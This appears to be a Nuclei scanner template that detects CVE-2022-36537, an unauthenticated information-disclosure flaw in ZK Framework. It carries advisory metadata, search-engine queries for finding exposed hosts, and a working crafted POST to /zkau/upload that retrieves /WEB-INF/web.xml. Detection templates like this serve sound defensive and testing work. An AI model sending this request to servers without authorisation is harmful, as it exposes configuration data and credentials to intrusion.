id: CVE-2022-36537

info:
  name: ZK Framework - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.
  remediation: |
    Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.
  reference:
    - https://github.com/Malwareman007/CVE-2022-36537/
    - https://tracker.zkoss.org/browse/ZK-5150
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36537
    - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36537
    cwe-id: CWE-200
    epss-score: 0.95859
    epss-percentile: 0.99401
    cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zkoss
    product: zk_framework
    shodan-query:
      - http.title:"Server backup manager"
      - http.title:"server backup manager"
    fofa-query: title="server backup manager"
    google-query: intitle:"server backup manager"
  tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss

http:
  - raw:
      - |
        GET /login.zul HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Length: 154

        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Disposition: form-data; name="nextURI"

        /WEB-INF/web.xml
        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - <display-name>.*</display-name>
          - |-
            <welcome-file-list>((.|
            )*)welcome-file-list>
          - xml version
          - web-app
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: dtid
        group: 1
        regex:
          - "dt:'(.*?)',cu:"
        internal: true
# digest: 4b0a0048304602210088d46f996e3c1f8b5979688247aa57ae8c0a045123afc4d7e12e8ec63a605c22022100d05a145cd04c888e03b75db2a06564b3cf2ca2e77346455bd13cc3519e6b94b5:922c64590222798bb761d5b6d8e72950